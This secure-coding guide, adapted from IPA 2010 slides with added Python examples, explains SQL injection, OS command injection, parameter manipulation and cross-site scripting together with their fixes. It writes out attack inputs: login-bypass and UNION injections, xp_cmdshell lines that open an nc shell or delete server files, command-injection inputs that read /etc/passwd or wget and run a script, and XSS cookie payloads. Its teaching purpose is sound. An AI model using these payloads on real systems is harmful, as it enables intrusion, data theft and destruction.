Section 3 (IPA, 2010)
IPA web page: http://www.ipa.go.jp/security/awareness/vendor/programming
Copyright 2010 IPA

Contents
3-1 SQL injection, OS command injection, parameter manipulation
  3-1-1 SQL injection countermeasures #1
  3-1-2 SQL injection countermeasures #2
  3-1-3 OS command injection
  3-1-4 Parameter manipulation
3-2 Cross-site scripting
  3-2-1 Cross-site scripting #2
  3-2-2 Cross-site scripting #1
  3-2-3 HTTP header injection
3-3
  3-3-1
  3-3-2
3-1 SQL injection, OS command injection, parameter manipulation

3-1-1 SQL injection countermeasures #1
What SQL injection is
The application builds an SQL statement by pasting user input into a fixed template. Example: a login check that looks up the account table (account_table) by user ID (uid) and password (pw):

    SELECT uid FROM account_table WHERE uid='<user ID>' AND pw='<password>'

If the user ID contains characters that have meaning in SQL, the input becomes part of the statement instead of being treated as a value.

Example attack: enter the following as the user ID:

    ' OR 1=1--

The statement the database receives is

    SELECT uid FROM account_table WHERE uid='' OR 1=1--' AND pw='<password>'

The first single quote closes the uid literal early, OR 1=1 makes the WHERE condition true for every row, and -- turns the rest of the line (including the password check) into a comment. The query returns a uid although no valid password was given, and the attacker is logged in. The root cause is that the application hands user input to the SQL interpreter without separating data from SQL syntax.
Countermeasure #1: use the placeholder mechanism of the database API
Do not assemble the SQL statement by string concatenation. Use the placeholder (bind variable, prepared statement) mechanism of the DB API: the statement text is fixed, and user input is sent to the database as a parameter value that is never parsed as SQL.

<< Java example >>

    String parameter = ...;   // user input
    Connection c = ...;       // database connection
    // The SQL text contains a placeholder (?) where the value will go
    PreparedStatement st = c.prepareStatement("SELECT name, price FROM product_table WHERE code=?");
    st.setString(1, parameter);   // bind the input to the first ? as a string value
    // Execute the statement
    ResultSet rs = st.executeQuery();

[Reference: http://www.thinkit.co.jp/cert/tech/7/5/3.htm]
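The login query from 3-1-1, built both ways and run against an in-memory SQLite database, as an added example that is not code from the IPA slides. The table, the single account row and the attack string are constructed here for the demonstration; the placeholder syntax (?) is the one SQLite's Python driver uses, matching the Java example above.

```python
"""Added example (not from the IPA slides): the login query from 3-1-1
built by string concatenation and with a placeholder, run against an
in-memory SQLite database.  The table, the account row and the attack
string are constructed here for the demonstration."""
import sqlite3

# The user-ID input shown on the slide.
ATTACK_UID = "' OR 1=1--"


def make_db() -> sqlite3.Connection:
    """Create account_table with a single constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE account_table (uid TEXT, pw TEXT)")
    conn.execute("INSERT INTO account_table VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, uid: str, pw: str):
    """String concatenation: the input is spliced into the SQL text, so a
    quote in uid ends the literal and the rest is parsed as SQL.
    Returns the uid of the matched row, or None."""
    sql = ("SELECT uid FROM account_table WHERE uid='" + uid
           + "' AND pw='" + pw + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, uid: str, pw: str):
    """Placeholders: the SQL text is fixed and the driver passes uid and pw
    as values.  The attack string is compared with the uid column as a
    plain string and matches nothing."""
    sql = "SELECT uid FROM account_table WHERE uid=? AND pw=?"
    row = conn.execute(sql, (uid, pw)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, attack input:", login_vulnerable(db, ATTACK_UID, "x"))  # alice
    print("placeholder, attack input:", login_safe(db, ATTACK_UID, "x"))       # None
```

Running it shows the concatenated query returning alice for the attack input (the password check was commented out), while the placeholder version returns nothing for the same input and still accepts the real credentials.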
Countermeasure #2: escape when the statement must be built as a string
If the API offers no placeholders and the SQL text has to be assembled by concatenation, every value embedded as a string literal '...' must be escaped first.

Escaping the single quote
Inside an SQL string literal the single quote (') ends the literal. To include a quote as data it is written twice (''). Examples:

    input           SQL literal
    don't           'don''t'
    80's            '80''s'
    Quark's Bar     'Quark''s Bar'

So every single quote in the input is replaced by two single quotes before the value is placed between quotes.

Escaping the backslash
Some RDBMSs (relational database management systems) also treat the backslash (\) as an escape character inside string literals. On such systems the backslash must be escaped too (\ becomes \\); doubling the quote alone is not enough. Example input:

    \' UNION SELECT uid, pw FROM account_table--

With only the quote doubled, the statement becomes

    SELECT name, price FROM product_table WHERE category='\'' UNION SELECT uid,pw FROM account_table--'

The RDBMS reads \' as an escaped quote, so the second ' closes the literal and the UNION SELECT is executed, returning user IDs and passwords. With the backslash escaped as well the literal contains \\'' and is closed where the application intended.

Numeric values
A value that is embedded without quotes (a number) is not protected by quote escaping. Check that the input has the form of a number before embedding it:
  - integer: an optional sign (+ or -) followed by digits 0-9 only
  - decimal: digits 0-9 and .
  - floating point: digits, ., and an exponent marker E or e
Reject anything else.

Multiple statements
Many RDBMSs accept several SQL statements in one request, separated by ;. If a numeric parameter is embedded without the check above, input such as

    123; update account_table set pw='foo' where uid='admin'

makes the RDBMS run the intended query with the value 123 and then the attacker's UPDATE, and

    123; delete from account_table

deletes the table contents. The numeric check stops both.
3-1-2 SQL injection countermeasures #2

Countermeasure #2: do not return database error messages to the browser
1. A raw SQL error in the HTML response tells the attacker which platform is in use and how the statement is built. Example (OS: Windows, web server: IIS, DB: MS SQL Server):

    Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
    [Microsoft][ODBC SQL Server Driver][SQL Server] ... " and password=

2. From such messages the attacker learns where the input lands in the SQL and refines the injection until it succeeds.
3. Handle DB errors inside the application: log the detail on the server and return a generic error page.
4. Where (3) cannot be done completely, at least make sure no SQL error text is ever copied into the HTML output.
Settings in the language runtime
PHP (php.ini):
    display_errors = Off           ; error messages are not written into the HTML output
    display_startup_errors = Off   ; PHP startup errors are not written into the HTML either
Check that display_errors is Off on the production server.

Settings in the web server (IIS, Apache). Example for Apache 2.0.59:
    ErrorLog logs/error.log
    LogLevel warn          # one of debug, info, notice, warn, error, crit, alert, emerg
    ServerTokens Prod      # default Full; levels are Full, OS, Minor, Minimal, Major, Prod
    ServerSignature Off    # default On; On, Off or EMail; Off omits the server line from error pages
Errors go to the error log, and the server no longer announces its OS and version in responses.

Settings in the RDBMS. Example for PostgreSQL (postgresql.conf):
    silent_mode (boolean, default off)   -- run the server detached, with output going to the log
    syslog (integer, default 0)          -- 0: messages to the OS standard output only
                                         -- 1: to both syslog and standard output
                                         -- 2: to syslog only
Send DB error output to the server log rather than to the application's output.

Database account privileges
Give the application's DB account only the privileges it needs. Use a read-only account (SELECT) for pages that only read, and a separate account with INSERT and UPDATE rights only for the processing that writes. If an injection gets through, the damage is limited to what that account is allowed to do.
Why privileges matter: stored procedures that run OS commands
Microsoft SQL Server provides the extended stored procedure xp_cmdshell, which runs an arbitrary Windows command. Through SQL injection with a sufficiently privileged DB account an attacker can call it, for example:

    '; exec master..xp_cmdshell 'nc -l -p 666 -e cmd.exe'--    start a listener that hands out a command shell
    '; exec master..xp_cmdshell 'echo 1 >> bad.vbs'--          write a VBScript file one line at a time
    '; exec master..xp_cmdshell 'echo 2 >> bad.vbs'--
    '; exec master..xp_cmdshell 'echo 3 >> bad.vbs'--
    '; exec master..xp_cmdshell 'bad.vbs'--                    run it
    '; exec master..xp_cmdshell 'del c:\*.* /F/Q/S'--          delete the files on the server

Disable xp_cmdshell if it is not needed, and never run the application with an account that may execute it.
3-1-3 OS command injection

OS command injection occurs when user input is embedded in a command line that the application hands to the OS shell.

Example: sending mail through sendmail (Perl)

    use CGI;
    my $cgi = CGI->new;
    my $to_address   = $cgi->param('to_address');    # untrusted input
    my $message_file = "/app/data/0012.txt";
    system("sendmail $to_address <$message_file");   # the whole line goes to /bin/sh

The to_address value is pasted into a shell command line, so shell syntax in it is executed. Attack inputs for to_address:
1. Read a file: evil@site </etc/passwd #  (the shell redirects /etc/passwd into sendmail, which mails it to the attacker; # comments out the rest of the line)
2. Open a backdoor: dummy@site </dev/null; nc -l -p 8080 sh #  (; ends the sendmail command and starts a listener that provides a shell)
3. Download and run a script: dummy@site </dev/null; wget http://site/badscript; sh badscript #
Countermeasure 1: know which API calls go through the shell
1. Functions that pass a command line to the shell (user input must never reach them unchecked):
   Perl: exec(), system(), `...`, qx/.../, open(FH, "| command"), open(FH, "command |"). open() and sysopen() need care as well: in open(handle, $pathname) a pathname that begins with <, > or | (or ends with |) is read as a mode or a pipe, so a user-supplied file name can start a command.
   PHP: exec(), passthru(), proc_open(), shell_exec(), system()
   Python: os.system(), os.popen()
   Ruby: exec(), system(), `...`. Ruby's exec() goes through the shell only when the command string contains a shell metacharacter: * ? { } [ ] < > ( ) ~ & \ $ ; ` or a newline. Ruby's open() starts a command when the path is "|command" (and forks for "|-"), so check the first character of any path handed to open().

Countermeasure 2: start the program without a shell
1. Use an API that takes the program and its arguments as a list and executes the program directly:
   C: execve() and the rest of the exec family
   Java: Runtime.exec()
   Perl: the list form of system() and exec()
   PHP: pcntl_exec() from the PCNTL extension (a POSIX exec). PCNTL is not available to PHP running inside a web server, only to the CLI.

Countermeasure 3: when the shell cannot be avoided
2. Reject input that contains shell metacharacters. For bash these include ; & | ` ( ) $ < > * ? { } [ ] !
3. Set the environment explicitly before running commands, so that PATH and other variables cannot be influenced from outside (Perl):

    %ENV = ();
    $ENV{'PATH'} = "/bin:/usr/bin";
    system($command);

Countermeasure 4: confine the process
1. Run the application in a chroot jail so that a successful injection sees only a restricted file tree. chroot alone is not a complete barrier: a process running as root can break out of it.
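The sendmail call from 3-1-3 rewritten in Python, as an added example that is not code from the IPA slides: the vulnerable form passes the whole line to /bin/sh exactly as the Perl system() does, and the hardened form applies countermeasures 2 and 3 (metacharacter check, argument list without a shell, explicit minimal environment). echo stands in for sendmail so the example runs anywhere with a POSIX shell; the metacharacter set is the union of the bash and Ruby lists above.

```python
"""Added example (not from the IPA slides): the sendmail call of 3-1-3
with and without the shell.  'echo' stands in for sendmail so that the
example runs offline on any POSIX system."""
import re
import subprocess
import tempfile

# Union of the shell metacharacters listed on the slides for bash and for
# Ruby's exec(); '|' is included because it is a command separator in sh.
SHELL_META = re.compile(r"[;&|`()$<>*?{}\[\]!~\\\n]")


def has_shell_meta(text: str) -> bool:
    """True if text contains any character the shell would interpret."""
    return SHELL_META.search(text) is not None


def write_message(text: str) -> str:
    """Write a constructed message body to a temporary file, return its path."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(text)
    return fh.name


def send_vulnerable(to_address: str, message_file: str, mailer: str = "echo") -> str:
    """Equivalent of Perl system("sendmail $to_address <$message_file"):
    the whole line is handed to /bin/sh, so ; < > # inside to_address are
    live shell syntax.  Returns what the shell printed."""
    cmd = "%s %s <%s" % (mailer, to_address, message_file)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def send_safe(to_address: str, message_file: str, mailer: str = "echo") -> str:
    """Countermeasures 2 and 3: reject metacharacters, run the program
    directly with an argument list (no shell is started, so nothing in
    to_address can become a second command), and start from an explicit
    minimal environment instead of inheriting the caller's."""
    if has_shell_meta(to_address):
        raise ValueError("address contains shell metacharacters: %r" % to_address)
    env = {"PATH": "/bin:/usr/bin"}
    with open(message_file, "rb") as fh:
        proc = subprocess.run([mailer, to_address], stdin=fh, env=env,
                              capture_output=True, text=True, check=True)
    return proc.stdout


if __name__ == "__main__":
    path = write_message("hello\n")
    attack = "dummy@site </dev/null; echo INJECTED #"
    print(send_vulnerable(attack, path))   # second echo ran: INJECTED appears
    try:
        send_safe(attack, path)
    except ValueError as exc:
        print("rejected:", exc)
```

With the shell in the loop the second command runs (here an echo, on the slide nc or wget); without it the address is just argv[1] of the mailer, and the metacharacter check additionally refuses such input before anything is started.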
3-1-4 Parameter manipulation

Every value in an HTTP request is produced on the client side and can be changed by the user before it is sent. A web application must not assume that any of them still has the value the application put into the page.

Values that look fixed but are chosen by the client include the value of a <select> list (the <option> values in the HTML are not a constraint; any value can be sent) and the HTTP request headers:
1. Cookie:
2. Referer:
3. User-Agent:

Validation performed by JavaScript in the browser is no protection either: the attacker sends the HTTP request directly, without running the JavaScript. Every check must be repeated on the server.
3-2-1 Cross-site scripting #2

How a cross-site scripting attack works
1. The application copies input into its HTML output without escaping it.
2. An attacker prepares a request to the web site whose input contains JavaScript and gets a victim to send it.
3. The script comes back inside the site's HTML and runs in the victim's browser as if it were part of the site.

What the injected script can do
1. Rewrite the page shown to the victim (a fake web page on the real site).
2. Read the victim's cookies for the site (cookie theft).
3. Where the session ID is kept in a cookie, steal it and take over the victim's session with the web application.
4. Read the values of hidden fields in forms on the page and send them to the attacker.
Places in HTML where script can be put
1. A <script> element
2. The URL of a <script src=...>
3. A javascript: URL in a URL attribute, e.g. <img src="javascript:...">
4. A style attribute with CSS expression(), e.g. <div style="...;z:expression(...);...">
5. An event handler attribute, e.g. <span onmouseover="...">
6. <a href="&{...};"> (JavaScript entities, Netscape 4.x only)

Injection patterns for each output position (the payload writes the session cookie jsessionid)
(1) Ordinary text: <script>document.cookie='jsessionid=bad'</script>
(2) Inside an attribute value: first close the attribute and the tag, then add the script: '"><script>document.cookie='jsessionid=bad'</script>
(3) Inside an HTML comment: first close the comment: --><script>document.cookie='jsessionid=bad'</script>
(4) In a URL attribute: javascript:document.cookie='jsessionid=bad'
(5) In a style attribute: red;z:expression(document.cookie='jsessionid=bad')
(6) Inside a JavaScript string literal in an event handler: xxx';document.cookie='jsessionid=bad
(7) Inside a string literal within <script>...</script>: xxx';document.cookie='jsessionid=bad (same as (6))
3-2-2 Cross-site scripting #1

Countermeasures: escape on output, according to where the value is placed

(1) HTML text
Before placing a value between tags, replace the characters that have meaning in HTML:
    <  ->  &lt;
    >  ->  &gt;
    "  ->  &quot;
    '  ->  &#39;
    &  ->  &amp;
With this, <script>...</script> in the input is shown as text and cannot start an element. It is not sufficient where the value lands somewhere other than ordinary text: in a URL, in a style, in an attribute such as <form id="xxx">, inside an HTML comment <!-- xxx -->, inside <script>...</script>, or when the browser reads the page as UTF-7. Those cases are covered by (2) to (4).

(2) Attribute values, URLs, styles and scripts
Values placed in attributes (href=, src=, style=, onload=, onmouseover=, ...) and inside <script>...</script> are not made safe by (1) alone: a value such as 'xxx' can end the attribute or the string literal. Always quote attribute values, and in addition:
1. URL attributes (href=, src=): accept only URLs that begin with http://, https://, or / (a path on this site); reject javascript: and any other scheme.
2. style attributes and <script>...</script>: do not place user input there. If a value must appear inside a JavaScript string literal, escape the characters that can end or extend it (` ; : ( ) and the quotes) in addition to (1).

(3) When the application must accept HTML
If users are allowed to supply HTML (for example formatted text), the HTML is data that the application has to understand. Parse it, keep only the elements and attributes the application needs, and regenerate the HTML from that result instead of passing the input through.

(4) Declare the character encoding
Send Content-Type: text/html; charset=... in the HTTP response header and the matching <meta http-equiv="content-type" content="text/html; charset=..."> in the HTML. Without a declared charset the browser guesses. In UTF-7, < can be written as +ADwA-, which passes the escaping in (1) unchanged and is decoded to < by a browser that has decided the page is UTF-7.
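The escaping rules of (1), (2) and (4) as a small set of output functions, an added example that is not code from the IPA slides. It uses Python's html module for the text and attribute contexts, a scheme whitelist for URL attributes, a hex-escaping routine for values inside JavaScript string literals, and emits the charset declaration in both the header and the meta tag; the function names are this example's own. The test inputs are the injection patterns from 3-2-1.

```python
"""Added example (not from the IPA slides): context-aware output escaping
for the positions discussed in 3-2-2."""
import html

_URL_SCHEMES = ("http://", "https://")


def escape_html_text(value: str) -> str:
    """(1) ordinary text between tags: & < > \" ' become entities."""
    return html.escape(value, quote=True)


def escape_html_attr(value: str) -> str:
    """(2) attribute value: same entities, and the value is always quoted so
    that '\"><script> cannot close the attribute or the tag."""
    return '"' + html.escape(value, quote=True) + '"'


def is_safe_url(value: str) -> bool:
    """(2)-1: only http://, https:// or a site-relative path starting with /.
    javascript:, data:, vbscript: and protocol-relative // are rejected."""
    url = value.strip()
    if url.lower().startswith(_URL_SCHEMES):
        return True
    return url.startswith("/") and not url.startswith("//")


def safe_url(value: str) -> str:
    if not is_safe_url(value):
        raise ValueError("URL scheme not allowed: %r" % value)
    return value.strip()


def escape_js_string(value: str) -> str:
    """(2)-2: a value inside a quoted JavaScript string literal.  Everything
    except letters, digits and a few harmless characters is written as a
    \\xHH or \\uHHHH escape, so quotes, ; : ( ) ` < > and newlines can
    neither end the literal nor form </script>."""
    out = []
    for ch in value:
        if ch.isalnum() or ch in " _-.,":
            out.append(ch)
        else:
            code = ord(ch)
            out.append("\\x%02x" % code if code < 256 else "\\u%04x" % code)
    return "".join(out)


def content_type_header(charset: str = "UTF-8") -> str:
    """(4) the response header line that fixes the encoding."""
    return "Content-Type: text/html; charset=%s" % charset


def html_document(body_html: str, charset: str = "UTF-8") -> str:
    """(4) a page whose <meta> repeats the charset so the browser never has
    to guess (and so cannot be steered to UTF-7)."""
    return ('<html><head><meta http-equiv="content-type" content="text/html; charset=%s">'
            '</head><body>%s</body></html>' % (charset, body_html))


def render_link(text: str, url: str) -> str:
    """A link built with all three escapes applied in their own contexts."""
    return '<a href=%s>%s</a>' % (escape_html_attr(safe_url(url)), escape_html_text(text))


if __name__ == "__main__":
    print(content_type_header())
    print(html_document(render_link("'\"><script>alert(1)</script>", "/home")))
    print(escape_js_string("xxx';document.cookie='jsessionid=bad"))
```

Each function is tied to exactly one output position; the bug the slides describe is applying the text rule (1) and then putting the result into a URL, a style or a script, where it is the wrong rule.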
3-2-3 HTTP header injection

3-3
3-3-1
3-3-2

Q & A